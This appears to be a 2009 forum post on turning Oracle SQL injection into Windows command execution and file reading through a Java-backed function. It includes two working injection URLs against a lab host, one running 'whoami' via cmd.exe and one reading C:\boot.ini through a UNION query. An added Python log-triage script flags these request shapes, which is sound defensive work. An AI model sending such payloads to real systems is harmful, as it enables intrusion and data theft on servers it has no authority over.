I finally managed to get this working. Just followed the instructions on the website:
These are the 5 steps:
1. Create Java class
2. Give execute permissions on Java
3. Create function to run cmd
4. Grant execute on function to public
5. Run the command.
I have copied all the long SQL commands in a text file to make things easier.
An example of command execution is:
http://192.168.172.129:81/ora2.php?name=1%20and%201=(select%20sys.LinxRunCMD(%27cmd.exe%20/c%20whoami%27)%20from%20dual)
The website also talks about some cool hacks to get the output of the command through OOB channels.
2:27 pm on April 27th, 2009
The text file also contains a function to read files, and you can get the output through a UNION query as:
http://192.168.172.129:81/ora2.php?name=1%20union%20all%20select%20sys.LinxReadFile('C:\boot.ini')%20from%20dual
So, execute command, pipe the output to a file and read it back via union.
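
For detection, both requests quoted above leave the same trace in a web server access log: a query-string parameter that decodes to a SELECT against dual calling a schema-qualified function. The following is an added example, not part of the original post or its comment; the log lines, client addresses, rule names and the two-rule threshold are constructed assumptions.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not captured traffic); the two
# suspicious entries reuse the request shapes quoted in the post.
SAMPLE_LOG = [
    '10.0.0.5 - - [27/Apr/2009:14:20:01 +0000] "GET /ora2.php?name=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [27/Apr/2009:14:21:13 +0000] "GET /ora2.php?name=1%20and%201='
    '(select%20sys.LinxRunCMD(%27cmd.exe%20/c%20whoami%27)%20from%20dual) HTTP/1.1" 200 498',
    '10.0.0.9 - - [27/Apr/2009:14:27:40 +0000] "GET /ora2.php?name=1%20union%20all%20select%20'
    'sys.LinxReadFile(%27C:%5Cboot.ini%27)%20from%20dual HTTP/1.1" 200 733',
    '10.0.0.7 - - [27/Apr/2009:14:30:02 +0000] "GET /search.php?q=dual+core+laptop HTTP/1.1" 200 2048',
]

REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Hypothetical rule names; each regex runs on the fully decoded query string.
RULES = {
    "select-from-dual": re.compile(r"\bselect\b.+\bfrom\s+dual\b", re.I | re.S),
    "union-select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema-function-call": re.compile(r"\b(?:sys|system)\.\w+\s*\(", re.I),
    "os-command-or-path": re.compile(r"cmd\.exe|/bin/(?:ba)?sh|[a-z]:\\", re.I),
}

def decoded_query(line):
    """Return the URL-decoded query string of a log line, or '' if none."""
    m = REQUEST_RE.search(line)
    if not m or "?" not in m.group(1):
        return ""
    query = m.group(1).split("?", 1)[1]
    # Decode twice so double-encoded input (%2527) is normalised as well.
    return unquote_plus(unquote_plus(query))

def findings(line):
    """Names of all rules that match the decoded query string, sorted."""
    query = decoded_query(line)
    return sorted(name for name, rx in RULES.items() if rx.search(query))

def triage(lines, threshold=2):
    """Return (client_ip, rule_names) for lines matching >= threshold rules."""
    hits = []
    for line in lines:
        names = findings(line)
        if len(names) >= threshold:
            hits.append((line.split()[0], names))
    return hits

if __name__ == "__main__":
    for ip, names in triage(SAMPLE_LOG):
        print(ip, ", ".join(names))
```

Requiring two rules to match keeps a benign search for the word "dual" from alerting, while both request shapes from the post match three or more.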